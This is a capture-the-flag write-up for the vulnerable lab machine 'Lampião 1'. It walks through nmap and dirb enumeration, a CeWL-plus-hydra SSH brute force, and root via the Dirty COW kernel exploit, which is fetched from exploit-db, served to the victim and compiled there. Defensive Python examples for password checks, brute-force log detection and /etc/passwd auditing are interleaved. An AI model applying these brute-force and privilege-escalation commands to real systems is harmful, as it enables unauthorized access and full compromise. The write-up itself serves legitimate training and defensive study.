Lampião

Would you like to keep hacking in your own lab? Try this brand new vulnerable machine, “Lampião 1”, and get root! This was a great machine, as I learnt about a Linux kernel vulnerability that was new to me: Dirty COW. In my experience the first foothold was easy, but escalating privileges was slightly trickier as it involved testing a few different CVEs. Some research helped me identify which one to use; at the end of the day it is experience with privesc that helps the most.

URL: Lampião

Difficulty: Easy

Author: Tiago Tavares

Enumeration

Set up the machine with a host-only adapter and run an nmap ping sweep to discover all the hosts on the host-only network. On my attacking OS (Kali Linux) the host-only interface is eth1.

nmap -sn 192.168.54.1/24

[screenshot: net]

The target is the machine with the IP 192.168.54.6, so we scan all of its TCP ports with nmap and save the output to a file named “nmap” with the following command:

nmap -sS -p- -A -oN nmap 192.168.54.6

[screenshot: nmap]

We see port 80 open so let’s visit this port with our browser. This is the webpage:

[screenshot: web]

There doesn’t seem to be much here, so I visit port 1898 in my web browser:

http://192.168.54.6:1898/

[screenshot: 1898]

According to the nmap results, there were quite a few entries in robots.txt. I’ll run a dirb scan to enumerate the paths:

dirb http://192.168.54.6:1898/

[screenshot: dirb]

First, I’ll visit the robots.txt:

http://192.168.54.6:1898/robots.txt

[screenshot: robots]

The above is a snippet showing just the Disallow entries. I first visited the CHANGELOG.txt path:

http://192.168.54.6:1898/CHANGELOG.txt

[screenshot: changelog]

We can identify a service and version number:

Drupal 7.54

This is worth noting in case we need to look up vulnerabilities for this version later.

I also wanted to note the potential username “tiago” I found on one of the posts:

http://192.168.54.6:1898/?q=node/1

[screenshot: username?]

The URL itself was worth investigating as well. I tried navigating to another post manually by changing ?q=node/1 to ?q=node/2:

http://192.168.54.6:1898/?q=node/2

[screenshot: node 2]

Another possible user, “Eder”, is highlighted in the screenshot above. There is also a node 3, but it gives no new information.

I couldn’t find much more information on the web pages of this machine, so I decided to go straight to brute forcing. There are 2 possible entry points: SSH (identified from our port scan) and the website login (no admin login page was found).

Let’s try brute forcing the SSH login. First, create a wordlist of the 2 usernames found:

Eder
tiago

[screenshot: user list]

I will use the following hydra command:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.54.6 -t 4 ssh

-L specifies the username wordlist, -P specifies the password wordlist and -t 4 runs 4 parallel tasks.

The hydra command took too long, so I wanted to build my own wordlist, especially as this site is in Portuguese. The post at ?q=node/1 has a lot of text, so I used a tool called CeWL to crawl that page and generate a wordlist for the brute force. Here is the command:

cewl http://192.168.54.6:1898/?q=node/1 --write passwords.txt

These are the first few lines of the wordlist we have just created:

[screenshot: head]
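The point of the CeWL step is that the password turned out to be a word from the site’s own content. The same idea works in reverse for a defender: before an account goes live, check whether its password is built from words anyone can read on the public site. Below is an added example (not part of the original post, and not CeWL’s code) that extracts CeWL-style candidate words from a page and tests a password against them, ignoring case and the trailing digit/symbol suffixes a brute forcer tries first. The HTML is a constructed stand-in for the node/1 post, not the real page.

```python
import re
from html.parser import HTMLParser

# Constructed stand-in for the post at ?q=node/1 (not the real page content).
SAMPLE_HTML = """
<html><head><title>Lampião</title>
<style>body { color: red }</style>
<script>var x = "ignoredScriptWord";</script></head>
<body>
<h1>Virgulino Ferreira da Silva</h1>
<p>Conhecido como Lampião, foi o mais famoso cangaceiro do Nordeste brasileiro.</p>
<p>Publicado por tiago</p>
</body></html>
"""


class WordCollector(HTMLParser):
    """Collects visible words (CeWL-style) while skipping <script>/<style> text."""

    SKIP = {"script", "style"}

    def __init__(self, min_length):
        super().__init__()
        self.min_length = min_length
        self._skip_depth = 0
        self.words = []

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if self._skip_depth:
            return  # inside <script> or <style>: not user-visible text
        # letters only (unicode-aware, so "Lampião" is one word), no digits or underscores
        for word in re.findall(r"[^\W\d_]+", data):
            if len(word) >= self.min_length:
                self.words.append(word)


def extract_words(html, min_length=5):
    """Return the page's visible words of at least min_length, first-seen order, no duplicates."""
    parser = WordCollector(min_length)
    parser.feed(html)
    return list(dict.fromkeys(parser.words))


def site_word_match(password, words):
    """Return the site word the password is derived from, or None.

    Comparison is case-insensitive and ignores a trailing run of digits/symbols,
    which covers mutations such as "virgulino2020!".
    """
    core = re.sub(r"[\d\W_]+$", "", password).lower()
    for word in words:
        if word.lower() == core:
            return word
    return None


if __name__ == "__main__":
    words = extract_words(SAMPLE_HTML)
    print("candidate words:", words)
    for candidate in ("Virgulino", "virgulino2020!", "correcthorse"):
        print(f"{candidate!r} ->", site_word_match(candidate, words))
```

Run this against your own site’s HTML with the real password policy check in the loop; a match means the password would fall to exactly the CeWL-plus-hydra combination used here.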

Let’s execute the hydra command again but with this new password list:

hydra -L users.txt -P passwords.txt 192.168.54.6 -t 4 ssh

[screenshot: hydra result]

Hydra returns a valid pair of credentials: tiago:Virgulino
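From the other side of the wire, the hydra runs above leave a very recognisable trace in the target’s /var/log/auth.log: a burst of “Failed password” lines from one source IP, cycling through the user list, followed by an “Accepted password”. The following is an added example (not part of the original post) of the detection logic a defender would run over those lines: a sliding window per source IP that fires once a threshold of failures lands within a few seconds, and records whether a successful login followed the burst. The log lines are constructed for the example; the year is assumed, since syslog timestamps do not carry one.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log lines (not captured from the machine).
SAMPLE_AUTH_LOG = """\
May 28 10:01:01 lampiao sshd[1201]: Failed password for invalid user Eder from 192.168.54.4 port 51002 ssh2
May 28 10:01:01 lampiao sshd[1202]: Failed password for tiago from 192.168.54.4 port 51003 ssh2
May 28 10:01:02 lampiao sshd[1203]: Failed password for invalid user Eder from 192.168.54.4 port 51004 ssh2
May 28 10:01:02 lampiao sshd[1204]: Failed password for tiago from 192.168.54.4 port 51005 ssh2
May 28 10:01:03 lampiao sshd[1205]: Failed password for tiago from 192.168.54.4 port 51006 ssh2
May 28 10:01:03 lampiao sshd[1206]: Failed password for invalid user Eder from 192.168.54.4 port 51007 ssh2
May 28 10:01:04 lampiao sshd[1207]: Accepted password for tiago from 192.168.54.4 port 51008 ssh2
May 28 10:15:00 lampiao sshd[1300]: Failed password for tiago from 192.168.54.9 port 40001 ssh2
May 28 10:15:10 lampiao sshd[1301]: Accepted password for tiago from 192.168.54.9 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2020):
    """Turn sshd auth lines into (timestamp, outcome, user, source_ip) tuples.

    `year` is an assumption: syslog lines carry no year.
    Lines that are not password-auth results (pam noise, disconnects) are skipped.
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["outcome"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, window_seconds=60, threshold=5):
    """Sliding-window detector keyed on source IP.

    An IP is flagged once `threshold` failed logins fall inside `window_seconds`.
    The alert records the peak failure count, every username tried, and whether an
    accepted login from that IP followed the burst (i.e. the guessing worked).
    """
    failures = defaultdict(list)   # ip -> timestamps of recent failures
    tried = defaultdict(set)       # ip -> usernames attempted
    alerts = {}
    for ts, outcome, user, ip in sorted(events):
        if outcome == "Failed":
            tried[ip].add(user)
            window = failures[ip]
            window.append(ts)
            # discard failures that have aged out of the window
            while (ts - window[0]).total_seconds() > window_seconds:
                window.pop(0)
            if len(window) >= threshold:
                alert = alerts.setdefault(ip, {"peak_failures": 0, "success_after_burst": False})
                alert["peak_failures"] = max(alert["peak_failures"], len(window))
                alert["users"] = sorted(tried[ip])
        elif outcome == "Accepted" and ip in alerts:
            alerts[ip]["success_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)).items():
        print(ip, alert)
```

The single failure from 192.168.54.9 followed by a login is a user mistyping once and stays quiet; the burst from 192.168.54.4 fires, and the success_after_burst flag is the line that should page someone, because it means the credential was found. This is the same logic fail2ban or pam_faillock apply automatically; running it over archived logs is how you find the hydra run after the fact.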

Let’s use this to connect via SSH:

ssh tiago@192.168.54.6
Virgulino

[screenshot: ssh login]

We have successfully logged in as the user tiago. Nice :)

Privilege Escalation

For this machine, I will use a script to identify potential kernel and userland vulnerabilities on the system. This is a good script that I recommend for Linux machines:

mzet Github

Let’s download this onto our local machine first:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

[screenshot: wget script]

Start an HTTP server so we can transfer the script to the victim machine:

python -m SimpleHTTPServer 8080

[screenshot: http]

Now let’s fetch the script into the victim’s /tmp directory from our SSH shell:

cd /tmp
wget http://192.168.54.4:8080/linux-exploit-suggester.sh

Make it executable and run it:

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

[screenshot: exe]

The output is a list of possible exploits; I will use this one in particular:

dirtycow2

It is called Dirty COW because the bug is a race condition in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings, which lets an unprivileged local user write to files they can only read.

Dirty Cow Exploit

Here is a youtube video about this exploit.

The video gives a download link, but the script is no longer hosted there. Use this site for the script instead:

Source Code

As we did before, download the script onto your local machine and start a simple HTTP server:

wget https://www.exploit-db.com/raw/40847
python -m SimpleHTTPServer 8080

[screenshot: http]

Now fetch the file into the victim’s /tmp directory and give it its .cpp extension:

wget http://192.168.54.4:8080/40847
mv 40847 40847.cpp

[screenshot: ready]

Now that we have 40847.cpp ready, compile it with the command given in the exploit’s header:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

[screenshot: compiled]

Now run “dcow”:

./dcow

[screenshot: dcow]

The exploit tells us that the root password has been changed to dirtyCowFun. Let’s switch to root:

su root
dirtyCowFun

We are now logged in as root!
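What dcow actually did to get here is write a new root entry into /etc/passwd, a file tiago could only read; that is why the “password has been changed” message appears and why the default password field marker is replaced by a hash. That leaves a clear artefact for a defender, and the following added example (not part of the original post, and not the exploit’s code) shows the integrity check that catches it: parse a baseline and the current /etc/passwd, report per-field changes, and flag the two conditions this class of attack creates, a password hash sitting in /etc/passwd instead of the shadow marker, and any extra uid-0 account. Both file contents are constructed, and the hash is a labelled placeholder.

```python
import hashlib

# Constructed baseline /etc/passwd (not copied from the machine).
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:Tiago,,,:/home/tiago:/bin/bash
"""

# Constructed post-exploit version: root's password field now carries a hash
# instead of the 'x' that defers to /etc/shadow. The hash is a placeholder, not real.
MODIFIED_PASSWD = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
tiago:x:1000:1000:Tiago,,,:/home/tiago:/bin/bash
"""

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_MARKERS = {"x", "*", "!", ""}   # values that mean "no usable hash here"


def parse_passwd(text):
    """Map account name -> dict of the seven passwd fields; reject malformed lines."""
    entries = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            raise ValueError(f"malformed passwd line: {line!r}")
        entries[parts[0]] = dict(zip(FIELDS, parts))
    return entries


def audit_passwd(baseline_text, current_text):
    """Return a list of human-readable findings; an empty list means nothing changed."""
    base, cur = parse_passwd(baseline_text), parse_passwd(current_text)
    findings = []
    for name in sorted(set(base) | set(cur)):
        if name not in cur:
            findings.append(f"account removed: {name}")
        elif name not in base:
            findings.append(f"account added: {name} (uid {cur[name]['uid']})")
        else:
            for field in FIELDS:
                if base[name][field] != cur[name][field]:
                    findings.append(f"{name}: {field} changed")
    # conditions specific to this attack class, independent of the baseline
    for name, entry in cur.items():
        if entry["passwd"] not in SHADOW_MARKERS:
            findings.append(f"{name}: password hash stored in /etc/passwd (shadow bypassed)")
        if entry["uid"] == "0" and name != "root":
            findings.append(f"{name}: extra uid 0 account")
    return findings


def fingerprint(text):
    """SHA-256 of the file content, the cheap check to run before the field-level diff."""
    return hashlib.sha256(text.encode()).hexdigest()


if __name__ == "__main__":
    print("baseline:", fingerprint(BASELINE_PASSWD))
    print("current: ", fingerprint(MODIFIED_PASSWD))
    for finding in audit_passwd(BASELINE_PASSWD, MODIFIED_PASSWD):
        print("-", finding)
```

On a real host you would read the baseline from a copy stored off-box and the current content from /etc/passwd; the hash comparison is what tools such as AIDE schedule, and the field-level findings are what turns “file changed” into “root’s password field was rewritten”, which is the dcow signature.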

[screenshot: root]

id
cd /root
cat flag.txt

Written on May 28, 2020